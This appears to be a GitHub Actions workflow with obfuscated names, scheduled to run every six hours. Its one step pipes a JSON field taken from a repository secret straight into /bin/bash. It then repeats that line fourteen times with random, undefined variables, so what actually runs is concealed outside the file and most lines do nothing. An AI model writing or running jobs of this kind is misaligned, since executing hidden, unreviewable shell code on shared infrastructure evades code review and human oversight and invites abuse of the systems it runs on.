name: caobushang9870

on:
  workflow_dispatch:
  schedule:
    - cron: '35 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caobushang9870
        env:
          a105: ${{ secrets.a105 }}
        run: |
          echo $a105 | jq -r .vya54 | /bin/bash
          echo $oi7 | jq -r .fj7744 | /bin/bash
          echo $ou4 | jq -r .gi7468 | /bin/bash
          echo $buq9 | jq -r .plhpt368 | /bin/bash
          echo $rgy29705 | jq -r .aave5932 | /bin/bash
          echo $yjs769 | jq -r .frfos3 | /bin/bash
          echo $u16 | jq -r .vezyt8710 | /bin/bash
          echo $drr575 | jq -r .yawj67 | /bin/bash
          echo $i6337 | jq -r .eos8 | /bin/bash
          echo $jybur99 | jq -r .d73 | /bin/bash
          echo $ulp0511 | jq -r .pmks63513 | /bin/bash
          echo $xzojq518 | jq -r .bof31 | /bin/bash
          echo $qqwq60 | jq -r .no6 | /bin/bash
          echo $v942 | jq -r .wumpi30 | /bin/bash
          echo $lw82 | jq -r .ohel822 | /bin/bash

